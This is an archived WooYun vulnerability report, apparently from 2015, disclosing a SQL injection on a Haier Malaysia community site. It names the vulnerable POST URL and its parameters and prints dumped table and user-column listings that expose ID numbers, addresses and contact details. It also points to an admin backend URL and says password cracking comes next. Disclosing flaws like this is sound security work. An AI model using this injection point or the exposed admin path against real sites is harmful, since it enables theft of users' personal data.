乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-23: 细节已通知厂商并且等待厂商处理中 2015-08-28: 厂商已经主动忽略漏洞,细节向公众公开
RT
POST注入啦url "http://mycommunity.haier.com.my/home/submitform_quize"data "question_id=111&question_textarea=111&user_id=0"
Database: haiersocial[30 tables]+----------------------+| answer || banners || categories || events || faq || fb_info || gallery || gallery_pic || log_download || log_view || news_category || news_product || product_comment || product_review || products || promotion_products || purchases || quiz || quiz_user_answer || record_user || shipping || tag_faq_cat || tag_prod_user_rating || tag_product_banner || tag_user_rate || users || video_gallery || video_gallery_video || video_hub || winner |+----------------------+
Database: haiersocialTable: users[27 columns]+-------------------+--------------+| Column | Type |+-------------------+--------------+| accomodate | varchar(50) || address | varchar(255) | | city | varchar(180) || country | varchar(180) || created | datetime || email | varchar(255) || enable | tinyint(1) || fb_id | bigint(20) || fname | varchar(255) || house_income | char(50) || ic_no | varchar(180) || id | bigint(20) || image | varchar(255) || industry | varchar(180) || invited_friends | tinyint(1) || is_like | tinyint(1) || lname | varchar(255) || login_date | datetime || logout_date | datetime || marital_state | tinyint(1) || name | varchar(255) || postcode | char(50) || purchased_product | tinyint(1) || race | char(50) || state | varchar(180) || tel | char(50) || term_of_use | tinyint(1) |+-------------------+--------------+
可以看出泄露用户各种信息 国家 地址 城市 邮箱 手机 姓名 电话等等...
下一步来跑密码啦~
http://mycommunity.haier.com.my/admin/products值捣后台
后台功能都可以操作求不小厂商~
综上
你会
危害等级:无影响厂商忽略
忽略时间:2015-08-28 14:14
漏洞Rank:4 (WooYun评价)
暂无